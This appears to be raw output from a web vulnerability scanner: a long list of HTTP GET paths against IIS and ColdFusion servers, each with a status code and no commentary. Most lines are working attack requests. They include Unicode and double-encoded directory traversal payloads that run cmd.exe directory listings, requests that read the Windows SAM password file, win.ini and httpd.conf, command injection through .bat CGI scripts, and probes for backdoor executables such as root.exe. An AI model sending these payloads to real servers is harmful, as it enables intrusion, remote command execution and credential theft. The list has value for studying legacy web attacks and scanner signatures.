GET***/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._***200
GET***/cfdocs/expeval/displayopenedfile.cfm***200
GET***/cfdocs/expeval/eval.cfm***200
GET***/cfdocs/expeval/openfile.cfm***200
GET***/cfdocs/expeval/sendmail.cfm***200
GET***/cfdocs/expressions.cfm***200
GET***/cfdocs/mole.cfm***200
GET***/cfdocs/root.cfm***200
GET***/cfdocs/snippets/***200
GET***/cfdocs/snippets/evaluate.cfm***200
GET***/cfdocs/snippets/fileexists.cfm***200
GET***/cfdocs/snippets/gettempdirectory.cfm***200
GET***/cfdocs/snippets/viewexample.cfm***200
GET***/cfdocs/toxic.cfm***200
GET***/cfdocs/zero.cfm***200
GET***/cfide/***200
GET***/cfide/Administrator/***200
GET***/cfide/Administrator/startstop.html***200
GET***/cfide/administrator/index.cfm***200
GET***/cfusion/cfapps/forums/data/forums.mdb***200
GET***/cfusion/cfapps/security/data/realm.mdb***200
GET***/cfusion/cfapps/security/realm_.mdb***200
GET***/cfusion/database/cfsnippets.mdb***200
GET***/cfusion/database/cypress.mdb***200
GET***/cfusion/database/smpolicy.mdb***200
GET***/cgi***200
GET***/cgi-bin***200
GET***/cgi-bin/***200
GET***/cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%255c..%255c/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\+/OG***200
GET***/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/../../../../winnt/system32/cmd.exe***200
GET***/cgi-bin/..\..\..\../winnt/system32/cmd.exe***200
GET***/cgi-bin/..\\..\\..\\..\\..\\..\\winnt\system32\cmd.exe?/c+dir+c:\\***200
GET***/cgi-bin/.._../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/CGImail.exe***200
GET***/cgi-bin/GW5***200
GET***/cgi-bin/GW5/GWWEB.EXE***200
GET***/cgi-bin/GWWEB.EXE***200
GET***/cgi-bin/MsmMask.exe***200
GET***/cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3***200
GET***/cgi-bin/Web_Store/web_store.cgi***200
GET***/cgi-bin/_vti_bin/***200
GET***/cgi-bin/_vti_cnf***200
GET***/cgi-bin/_vti_cnf/***200
GET***/cgi-bin/admin.pl***200
GET***/cgi-bin/alibaba.pl***200
GET***/cgi-bin/bb-hostsvc.sh***200
GET***/cgi-bin/c32web.exe/CheckError?error=53***200
GET***/cgi-bin/c32web.exe/ShowAdminDir***200
GET***/cgi-bin/ceilidh.exe***200
GET***/cgi-bin/cfgwiz.exe***200
GET***/cgi-bin/cgimail.exe***200
GET***/cgi-bin/cgitest.exe***200
GET***/cgi-bin/changepw.exe***200
GET***/cgi-bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/cmd.exe?/c+dir***200
GET***/cgi-bin/cmd1.exe?/c+dir***200
GET***/cgi-bin/contents.htm***200
GET***/cgi-bin/csChatRBox.cgi***200
GET***/cgi-bin/csLiveSupport.cgi***200
GET***/cgi-bin/csNews.cgi***200
GET***/cgi-bin/dbmlparser.exe***200
GET***/cgi-bin/echo.bat***200
GET***/cgi-bin/eyehack.exe?/c+dir+c:\***200
GET***/cgi-bin/fpadmin.htm***200
GET***/cgi-bin/fpcount.exe***200
GET***/cgi-bin/fpexplore.exe***200
GET***/cgi-bin/fpexplorer.exe***200
GET***/cgi-bin/fpremadm.exe***200
GET***/cgi-bin/fpsrvadm.exe***200
GET***/cgi-bin/get32.exe***200
GET***/cgi-bin/get32.exe\dir***200
GET***/cgi-bin/guestbook.cgi***200
GET***/cgi-bin/hello.bat***200
GET***/cgi-bin/hello.bat?&dir+c:\***200
GET***/cgi-bin/htimage.exe***200
GET***/cgi-bin/iisadmpwd/achg.htr***200
GET***/cgi-bin/iisadmpwd/aexp.htr***200
GET***/cgi-bin/iisadmpwd/aexp2.htr***200
GET***/cgi-bin/iisadmpwd/anot.htr***200
GET***/cgi-bin/imagemap.exe***200
GET***/cgi-bin/input.bat***200
GET***/cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\***200
GET***/cgi-bin/input2.bat***200
GET***/cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\***200
GET***/cgi-bin/lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/lsindex2.bat***200
GET***/cgi-bin/mailform.exe***200
GET***/cgi-bin/minimal.exe***200
GET***/cgi-bin/perl.exe***200
GET***/cgi-bin/post32.exe***200
GET***/cgi-bin/post32.exe|dir%20c:\***200
GET***/cgi-bin/ppdscgi.exe***200
GET***/cgi-bin/redir.exe***200
GET***/cgi-bin/redirect.exe***200
GET***/cgi-bin/rguest.exe***200
GET***/cgi-bin/root.exe?/c+dir+c:\***200
GET***/cgi-bin/sam._***200
GET***/cgi-bin/scripts/***200
GET***/cgi-bin/scripts/Fpadmcgi.exe***200
GET***/cgi-bin/scripts/perl.exe***200
GET***/cgi-bin/scripts/perl?***200
GET***/cgi-bin/scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwd&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm***200
GET***/cgi-bin/scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwl&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm***200
GET***/cgi-bin/scripts/shopplus.cgi***200
GET***/cgi-bin/search97.vts***200
GET***/cgi-bin/sensepost.exe?/c+dir***200
GET***/cgi-bin/sensepost.exe?/c+dir+c:\***200
GET***/cgi-bin/shop.cgi***200
GET***/cgi-bin/shopper.cgi***200
GET***/cgi-bin/shtml.dll***200
GET***/cgi-bin/snorkerz.bat***200
GET***/cgi-bin/snorkerz.cmd***200
GET***/cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3***200
GET***/cgi-bin/statsconfig.pl***200
GET***/cgi-bin/test.bat***200
GET***/cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\***200
GET***/cgi-bin/test.cgi***200
GET***/cgi-bin/testcgi.exe***200
GET***/cgi-bin/tst.bat***200
GET***/cgi-bin/tst.bat\dir***200
GET***/cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\***200
GET***/cgi-bin/visadmin.exe***200
GET***/cgi-bin/visadmin.exe?user=guest***200
GET***/cgi-bin/visitor.exe***200
GET***/cgi-bin/wconsole.dll***200
GET***/cgi-bin/webbbs.exe***200
GET***/cgi-bin/webbbs/webbbs_config.pl***200
GET***/cgi-bin/webbbs/webbbs_post.pl***200
GET***/cgi-bin/webbbs/webbbs_settings.pl***200
GET***/cgi-bin/webplus.exe***200
GET***/cgi-bin/wguest.exe***200
GET***/cgi-bin/windmail.exe***200
GET***/cgi-bin/ws_ftp.ini***200
GET***/cgi-dos/args.bat***200
GET***/cgi-dos/args.cmd***200
GET***/cgi-shl/win-c-sample.exe***200
GET***/cgi-win***200
GET***/cgi-win/perl.exe***200
GET***/cgi-win/uploader.exe***200
GET***/cgi-win/wguest.exe***200
GET***/cgi-win/wincgi.bat***200
GET***/cgi/***200
GET***/cgi/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgibin***200
GET***/cgibin/***200
GET***/cmd.exe?/c+dir%20c:\***200
GET***/common/browser.inc***200
GET***/config/checks.txt***200
GET***/config/import.txt***200
GET***/config/mountain.cfg***200
GET***/config/orders.txt***200
GET***/contents/extensions/asp/1***200
GET***/cpqlogin.htm***200
GET***/database/db2000.mdb***200
GET***/default.asp%2e%41sp***200
GET***/default.asp%2e***200
GET***/default.asp%81***200
GET***/default.asp***200
GET***/default.asp+.htr***200
GET***/default.asp.***200
GET***/default.asp::$DATA***200
GET***/default.asp\\***200
GET***/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiWebHitsFile=../../../../../../../../../win.ini&CiRestriction=none&CiHiliteType=Full***200
GET***/doc***200
GET***/enter_bug.cgi***200
GET***/ex/jsp/simple.jsp.***200
GET***/exchange/***401
GET***/exchange/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\+/OG***200
GET***/exchange/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/exchange/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/exchange/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/exchange/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/exchange/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/exchange/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/exchange/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/exchange/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/exchange/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/exchange/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/exchange/help/welcome.htm***200
GET***/exchange/lib/AMPROPS.INC***401
GET***/exchange/lib/ATTACH.INC***401
GET***/exchange/lib/DELETE.INC***401
GET***/exchange/lib/GETREND.INC***401
GET***/exchange/lib/GETWHEN.INC***401
GET***/exchange/lib/JSATTACH.INC***401
GET***/exchange/lib/JSROOT.INC***401
GET***/exchange/lib/JSUTIL.INC***401
GET***/exchange/lib/LANG.INC***401
GET***/exchange/lib/PAGEUTIL.INC***401
GET***/exchange/lib/PUBFLD.INC***401
GET***/exchange/lib/RENDER.INC***401
GET***/exchange/lib/SESSION.INC***401
GET***/exchange/lib/logon.inc***401
GET***/exchange/root.asp?acs=anon***401
GET***/exchweb/help/USA/ie5/default.htm***200
GET***/file/index.jsp***200
GET***/filemanager/filemanager_forms.php***200
GET***/getFile.cfm***200
GET***/getfile.cfm***200
GET***/getfile.cfm?FT=Text&FST=Plain&FilePath=C:\\WINNT\\repair\\sam._***200
GET***/global.asa***200
GET***/global.asa***401
GET***/global.asa+.htr***200
GET***/head.css***200
GET***/hosts.dat***200
GET***/iisadmin***200
GET***/iisadmin/***200
GET***/iisadmpwd/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/iisadmpwd/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe?/c+dir***200
GET***/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/iisadmpwd/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\+/OG***200
GET***/iisadmpwd/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir***200
GET***/iisadmpwd/achg.htr***200
GET***/iisadmpwd/aexp.htr***200
GET***/iisadmpwd/aexp2.htr***200
GET***/iisadmpwd/aexp2b.htr***200
GET***/iisadmpwd/aexp3.htr***200
GET***/iisadmpwd/aexp4.htr***200
GET***/iisadmpwd/aexp4b.htr***200
GET***/iisadmpwd/anot.htr***200
GET***/iisadmpwd/anot3.htr***200
GET***/iisadmpwd/eyehack.exe?/c+dir+c:\***200
GET***/iisadmpwd/lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir***200
GET***/iisadmpwd/root.exe?/c+dir+c:\***200
GET***/iisadmpwd/sensepost.exe?/c+dir+c:\***200
GET***/iisamples/Sdk***200
GET***/iishelp/iis/misc/iirturnh.htw***200
GET***/iishelp/iis/misc/iirturnh.htwa***200
GET***/iissamples***200
GET***/iissamples/Default***200
GET***/iissamples/ExAir***200
GET***/iissamples/exair/howitworks/Codebrw1.asp***200
GET***/iissamples/exair/howitworks/Winmsdp.exe***200
GET***/iissamples/exair/howitworks/code.asp***200
GET***/iissamples/exair/howitworks/codebrws.asp***200
GET***/iissamples/exair/howitworks/showcode.asp***200
GET***/iissamples/exair/search/advsearch.asp***200
GET***/iissamples/exair/search/qfullhit.htw***200
GET***/iissamples/exair/search/qsumrhit.htw***200
GET***/iissamples/exair/search/query.asp***200
GET***/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini***200
GET***/iissamples/exair/search/search.asp***200
GET***/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini***200
GET***/iissamples/iissamples/query.asp***200
GET***/iissamples/issamples***200
GET***/iissamples/issamples/SQLQHit.asp***200
GET***/iissamples/issamples/Winmsdp.exe***200
GET***/iissamples/issamples/codebrws.asp***200
GET***/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini***200
GET***/iissamples/issamples/ixqlang.htm***200
GET***/iissamples/issamples/oop/qfullhit.htw***200
GET***/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full***200
GET***/iissamples/issamples/oop/qsumrhit.htw***200
GET***/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full***200
GET***/iissamples/issamples/query.asp***200
GET***/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini***200
GET***/iissamples/issamples/sqlqhit.asp***200
GET***/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp***200
GET***/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp***200
GET***/iissamples/sdk/asp/docs/Winmsdp.exe***200
GET***/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp***200
GET***/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp***200
GET***/iissamples/sdk/asp/docs/codebrw2.asp***200
GET***/iissamples/sdk/asp/docs/codebrws.asp***200
GET***/include/css.css***200
GET***/include/head.html***200
GET***/index.asp%2e%41sp***200
GET***/index.asp%2e***200
GET***/index.asp%81***200
GET***/index.asp+.htr***200
GET***/index.asp.***200
GET***/index.asp::$DATA***200
GET***/index.asp\\***200
GET***/index.jsp***200
GET***/index.php3.%5c../..%5cconf/httpd.conf***200
GET***/isapi/tstisapi.dll***200
GET***/junk.aspx***200
GET***/log.htm***200
GET***/log.html***200
GET***/log.nsf***200
GET***/log.txt***200
GET***/log/***200
GET***/logfile***200
GET***/logfile.htm***200
GET***/logfile.html***200
GET***/logfile.txt***200
GET***/logfile/***200
GET***/logfiles/***200
GET***/logger.html***200
GET***/logger/***200
GET***/login.asp%3F+.htr***200
GET***/logs/***200
GET***/logs/access_log***200
GET***/main.asp%2e%41sp***200
GET***/main.asp%2e***200
GET***/main.asp%81***200
GET***/main.asp+.htr***200
GET***/main.asp.***200
GET***/main.asp::$DATA***200
GET***/main.asp\\***200
GET***/msadc***200
GET***/msadc/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/msadc/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe?/c+dir***200
